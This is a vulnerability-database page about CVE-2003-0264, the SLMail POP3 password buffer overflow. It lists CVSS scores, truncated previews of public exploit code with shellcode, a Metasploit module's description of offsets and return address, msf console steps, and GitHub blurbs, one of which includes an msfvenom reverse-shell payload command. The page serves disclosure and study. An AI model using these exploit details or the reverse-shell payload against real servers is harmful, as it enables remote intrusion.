7.5
CVSSv2

CVE-2003-0264

Published: 27/05/2003 Updated: 24/02/2021
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 812
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple buffer overflows in SLMail 5.1.0.4420 allows remote malicious users to execute arbitrary code via (1) a long EHLO argument to slmail.exe, (2) a long XTRN argument to slmail.exe, (3) a long string to POPPASSWD, or (4) a long password to the POP3 server.

Most Upvoted Vulmon Research Post

There is no Researcher post for this vulnerability
Would you like to share something about it? Sign up now to share your knowledge with the community.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

seattle lab software slmail 5.1.0.4420

Exploits

######################################################### # # # SLmail 55 POP3 PASS Buffer Overflow # # Discovered by : Muts # # Coded by : Muts # # wwwoffseccom # # Pl ...
/* SLMAIL REMOTE PASSWD BOF - Ivan Ivanovic Ivanov Иван-дурак недействительный 31337 Team */ #include <stringh> #include <stdioh> #include <winsock2h> #include <windowsh> // [*] bind 4444 unsigned char shellcode[] = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45" "\x3c\x8b\ ...
## # $Id: seattlelab_passrb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' class ...
#include <fcntlh> #include <stdioh> #include <stdlibh> #include <sys/socketh> #include <sys/typesh> #include <sys/waith> #include <errnoh> #include <netinet/inh> #include <netdbh> #include <stringh> define retadd "\x9f\x45\x3a\x77" /*win2k server sp4 0x773a459f*/ #define port 1 ...

Mailing Lists

SLMail version 5104420 remote code execution exploit ...

Metasploit Modules

Seattle Lab Mail 5.5 POP3 Buffer Overflow

There exists an unauthenticated buffer overflow vulnerability in the POP3 server of Seattle Lab Mail 5.5 when sending a password with excessive length. Successful exploitation should not crash either the service or the server; however, after initial use the port cannot be reused for successive exploitation until the service has been restarted. Consider using a command execution payload following the bind shell to restart the service if you need to reuse the same port. The overflow appears to occur in the debugging/error reporting section of the slmail.exe executable, and there are multiple offsets that will lead to successful exploitation. This exploit uses 2606, the offset that creates the smallest overall payload. The other offset is 4654. The return address is overwritten with a "jmp esp" call from the application library SLMFC.DLL found in %SYSTEM%\system32\. This return address works against all version of Windows and service packs. The last modification date on the library is dated 06/02/99. Assuming that the code where the overflow occurs has not changed in some time, prior version of SLMail may also be vulnerable with this exploit. The author has not been able to acquire older versions of SLMail for testing purposes. Please let us know if you were able to get this exploit working against other SLMail versions.

msf > use exploit/windows/pop3/seattlelab_pass
      msf exploit(seattlelab_pass) > show targets
            ...targets...
      msf exploit(seattlelab_pass) > set TARGET <target-id>
      msf exploit(seattlelab_pass) > show options
            ...show and set options...
      msf exploit(seattlelab_pass) > exploit

Github Repositories

Customizable TCP fuzzing tool to test for remote buffer overflows.

fuzza Customizable TCP fuzzing tool to test for remote buffer overflows fuzza is able to send and receive any initial commands prior sending the payload as well as sending any post commands after the payload has been sent In order to replicate and triage the buffer overflow, fuzza can be used to generate custom python scripts for attack, badchars and finding the eip

Exploit CVE-2003-0264

CVE-2003-0264- Exploit CVE-2003-0264

A POC remote buffer overflow for CVE-2003-0264 - SLMail 5.5

CVE-2003-0264 - Seattle Lab Mail 55 POP3 Buffer Overflow References cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2003-0264 Vulnerability SLMail has no bounds checking when submitting a POP3 password As a result, you can execute arbitrary code by submitting a long, malformed POP3 PASS to the SLMail server

slmail-exploit CVE-2003-0264 Remote Buffer Overflow

Um exploit de buffer overflow para SLmail-5.5 pop3 service CVE-2003-0264

pop3_SLmail-exploit Um exploit de buffer overflow para SLmail-55 pop3 service CVE-2003-0264 para usalo: gere um shell code com o metasploit msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=444 -b "\x00\x0a\x0d\x20" -f python dps copie os decimais gerados e substitua o shell-code setado no codigo para o novo

CVE-2003-0264_EXPLOIT Buffer Overflow in Seattle Lab Mail (SLmail) 55 - POP3

CVE-2003-0264 - SLMail 5.5 POP3 'PASS' Remote Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.

CVE-2003-0264

Public exploits and modifications

Exploits Public exploits modifications CVE-2002-0082 Apache mod_ssl &lt; 287 OpenSSL - OpenFuckV2c Remote Buffer Overflow Fixes compilation errors CVE-2009-3103 Remote Code Execution via "SMBv2 Negotiation Vulnerability" Fixes compilation errors CVE-2017-0143 aka MS17-010 Remote Code Execution vulnerability in Microsoft SMBv1 Fixes compilation errors CVE-2003-